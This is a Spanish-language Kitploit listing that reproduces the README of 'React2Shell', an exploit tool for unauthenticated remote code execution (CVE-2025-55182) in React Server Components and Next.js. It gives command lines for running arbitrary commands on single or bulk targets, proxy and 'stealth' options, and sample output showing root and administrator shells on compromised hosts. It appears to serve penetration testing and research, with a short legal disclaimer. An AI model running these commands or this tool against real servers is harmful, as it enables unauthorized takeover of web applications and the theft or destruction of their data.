Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
React2Shell — CVE-2025-55182-advanced-scanner | Kitploit
Herramientas/GitHubGitHub/ankitspandey07/react2shell
Escáneres de VulnerabilidadesGeneración de PayloadsExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y ControlRed TeamingHerramienta de Acceso Remoto
GitHubankitspandey07/react2shell

React2Shell

CVE-2025-55182-advanced-scanner

Ver Repositorio
hace 8 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

@#React2Hell — CVE-2025-55182 Exploit

🔥 Exploit de Ejecución Remota de Código (RCE) en Next.js / React Server

root@kitploit:~
█████▄  ▄▄▄▄▄  ▄▄▄   ▄▄▄▄ ▄▄▄▄▄▄ ████▄ ▄▄▄▄▄  ██  ██ ▄▄▄▄▄ ▄▄    ▄▄    
██▄▄██▄ ██▄▄  ██▀██ ██▀▀▀   ██    ▄██▀ ██▄▄   ██████ ██▄▄  ██    ██    
██   ██ ██▄▄▄ ██▀██ ▀████   ██   ███▄▄ ▄▄▄███ ██  ██ ██▄▄▄ ██▄▄▄ ██▄▄▄ 
                                                                
{MAGENTA} Exploit RCE en Next.js/React Server — CVE-2025-55182
 Autor: Ankit Pandey GitHub: https://github.com/ankitspandey07
    🚀  React2Shell — Utilidad de Pruebas de Seguridad  🚀

════════════════════════════════════════════════════════════════════════
usage: new.py [-h] [-u URL] [-l LIST] -c COMMAND [--proxy PROXY] [--proxy-https PROXY_HTTPS]

🚀 Resumen

React2Hell es una potente herramienta de explotación diseñada para probar y explotar CVE-2025-55182, una vulnerabilidad crítica de Ejecución Remota de Código que afecta a Next.js y React Server Actions.

Existe una vulnerabilidad de ejecución remota de código sin autenticación previa en las versiones de React Server Components 19.0.0, 19.1.0, 19.1.1 y 19.2.0, incluyendo los siguientes paquetes: react-server-dom-parcel, react-server-dom-turbopack y react-server-dom-webpack. El código vulnerable deserializa de forma insegura cargas útiles de solicitudes HTTP a endpoints de Server Function.


✨ Características

  • 🧨 Ejecución Remota de Código (RCE)
  • 🌐 Escaneo de URL única / Múltiples URL
Descargar herramienta
  • 🧩 Ejecución de comandos personalizados
  • 🕵️‍♂️ Modo sigiloso con soporte de proxy
  • ⚡ Rápido, fiable y fácil de usar

  • 📌 Uso

    Modo de objetivo único

    root@kitploit:~
    python Scanner.py -u https://target.com -c "whoami"
    

    Múltiples objetivos (desde archivo)

    root@kitploit:~
    python Scanner.py -l urls.txt -c "whoami"
    

    Con proxy HTTP (Burp Suite)

    root@kitploit:~
    python Scanner.py -u https://target.com -c "whoami" --proxy 127.0.0.1:8080
    

    Con proxy HTTPS

    root@kitploit:~
    python Scanner.py -u https://target.com -c "whoami" --proxy-https 127.0.0.1:8080
    

    📁 Ejemplo de urls.txt

    root@kitploit:~
    http://site1.com
    https://site2.com
    http://192.168.1.10:3000
    

    🖥️ Salida de ejemplo

    root@kitploit:~
    PS D:\Ankitspandey07\React2Hell> python.exe .\Scanner.py -l .\list.txt -c whoami
    
    
    █████▄  ▄▄▄▄▄  ▄▄▄   ▄▄▄▄ ▄▄▄▄▄▄ ████▄ ▄▄▄▄▄  ██  ██ ▄▄▄▄▄ ▄▄    ▄▄    
    ██▄▄██▄ ██▄▄  ██▀██ ██▀▀▀   ██    ▄██▀ ██▄▄   ██████ ██▄▄  ██    ██    
    ██   ██ ██▄▄▄ ██▀██ ▀████   ██   ███▄▄ ▄▄▄███ ██  ██ ██▄▄▄ ██▄▄▄ ██▄▄▄ 
                                                                    
    {MAGENTA} Next.js/React Server RCE Exploit — CVE-2025-55182
     Author: Ankit Pandey GitHub: https://github.com/ankitspandey07
        🚀  React2Shell — Security Testing Utility  🚀
    
    ════════════════════════════════════════════════════════════════════════
    [+] Loaded 3 targets
    ════════════════════════════════════════════════════════════════════════
    
    [→] Target: http://evil.com:3113/
    [→] Exec:   whoami
    [✓] VULNERABLE — RCE Successful!
    ------------------------------------------------------------
    root
    ------------------------------------------------------------
    ────────────────────────────────────────────────────────────────────────
    
    [→] Target: http://example.lab:2000/
    [→] Exec:   whoami
    [✗] Not vulnerable — Status: 200
    ────────────────────────────────────────────────────────────────────────
    
    [→] Target: https://tale.lab:3000/
    [→] Exec:   whoami
    [✓] VULNERABLE — RCE Successful!
    ------------------------------------------------------------
    win-1fl835ovldc\\administrator
    ------------------------------------------------------------
    ────────────────────────────────────────────────────────────────────────
    [✓] Scan complete — Vulnerable: 2
    PS D:\Ankitspandey07\React2Hell>
    

    ⚠️ Aviso legal

    Esta herramienta se crea estrictamente con fines educativos y de investigación en seguridad. NO la uses en sistemas sin autorización explícita. Eres responsable de tus propias acciones.


    ⭐ Apoya el proyecto

    Si este exploit te ayudó, considera dejar una ⭐ en GitHub ❤️


    👤 Autor

    Ankit Pandey; GitHub: https://github.com/Ankitspandey07

    Hecho con 🔥 por alguien que es un Pentester orgulloso y apasionado, que prospera aprendiendo en cada paso del camino.